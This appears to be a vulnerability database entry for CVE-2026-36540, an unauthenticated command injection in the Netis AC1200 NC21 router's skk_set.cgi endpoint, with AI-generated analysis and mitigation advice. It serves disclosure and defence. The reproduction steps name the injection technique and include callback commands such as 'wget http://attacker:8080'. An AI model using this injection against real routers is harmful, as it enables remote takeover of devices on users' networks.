CVE-2026-36540
Description
Netis AC1200 Router NC21 V4.0.1.4296 is vulnerable to unauthenticated command injection via the /cgi-bin/skk_set.cgi endpoint. The password and new_pwd_confirm POST parameters are passed directly to the underlying OS shell without sanitization. An attacker can inject arbitrary shell commands by wrapping them in backticks (`) and encoding them in base64. Because the endpoint requires no authentication, any device on the LAN can achieve full Remote Code Execution on the router's operating system with a single HTTP POST request.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated command injection in Netis AC1200 Router NC21 allows remote code execution via base64-encoded backtick payloads.
Vulnerability
The Netis AC1200 Router NC21 running firmware version V4.0.1.4296 contains an unauthenticated command injection vulnerability in the /cgi-bin/skk_set.cgi endpoint. The password and new_pwd_confirm POST parameters are passed directly to the underlying OS shell without any sanitization. An attacker can inject arbitrary shell commands by wrapping them in backticks and encoding the payload in base64. The endpoint requires no authentication, so any device on the local network can reach it. A proof-of-concept exploit is available in the disclosure repository [1].
Exploitation
An attacker only needs network access to the router's LAN (no authentication). The exploit sends a single HTTP POST request to /cgi-bin/skk_set.cgi with the malicious base64-encoded command in both the password and new_pwd_confirm fields. The CGI decodes the base64 string and passes it to a shell, where backticks cause the injected command to execute. For example, an attacker can run wget http://attacker:8080 to trigger an outbound connection, confirming code execution. The disclosure provides a full Python proof-of-concept script [1]. No race condition or user interaction is needed.
Impact
Successful exploitation yields full remote code execution on the router's underlying operating system with root privileges. The attacker can execute arbitrary shell commands, potentially gaining complete control over the device. This could lead to information disclosure (e.g., network traffic capture), denial of service, or further propagation within the network. The proof-of-concept demonstrates that the router initiates outbound connections, proving OS-level command execution [1].
Mitigation
As of the publication date (2026-05-27), the vendor (Netis Systems) has not responded to disclosure reports, and no patch has been released. Users should consider isolating the router from untrusted LAN segments or replacing it with a supported model. The vulnerability is not known to be listed in CISA's Known Exploited Vulnerabilities (KEV) catalog at this time. A firewall rule blocking access to /cgi-bin/skk_set.cgi from non-admin IPs may reduce risk, but the only complete mitigation is to update to a fixed firmware version when available [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: =4.0.1.4296
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the `/cgi-bin/skk_set.cgi` endpoint allows shell metacharacters in the `password` and `new_pwd_confirm` parameters to be passed directly to the OS shell."
Attack vector
An attacker on the same LAN sends a single HTTP POST request to `http://192.168.1.1/cgi-bin/skk_set.cgi` with no authentication required [ref_id=1]. The `password` and `new_pwd_confirm` parameters are base64-encoded shell commands wrapped in backticks; the CGI endpoint decodes and passes them unsanitized to the OS shell, achieving arbitrary command execution [ref_id=1]. The attacker can then exfiltrate data, install malware, or pivot to other internal hosts.
Affected code
The vulnerability resides in the `/cgi-bin/skk_set.cgi` endpoint. The `password` and `new_pwd_confirm` POST parameters are passed directly to the underlying OS shell without sanitization [ref_id=1].
What the fix does
No patch has been released by the vendor (Netis Systems) as of the publication date [ref_id=1]. The advisory recommends sanitizing or escaping shell metacharacters (such as backticks) in the `password` and `new_pwd_confirm` parameters before passing them to the OS shell, and ideally avoiding shell execution altogether by using safer API calls [ref_id=1].
Preconditions
- networkAttacker must be on the same LAN as the router (target IP 192.168.1.1)
- authNo authentication required
- inputAttacker must be able to send HTTP POST requests to the router
Reproduction
1. Start a listener on the attacker machine: `python3 -m http.server 8080` [ref_id=1]. 2. Run the provided Python exploit script that sends a POST request to `http://192.168.1.1/cgi-bin/skk_set.cgi` with the `password` and `new_pwd_confirm` parameters set to a base64-encoded shell command wrapped in backticks (e.g., `` `wget http://192.168.1.101:8080` ``) [ref_id=1]. 3. Observe the attacker's HTTP server receiving a connection from the router's IP (192.168.1.1), confirming remote code execution [ref_id=1].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.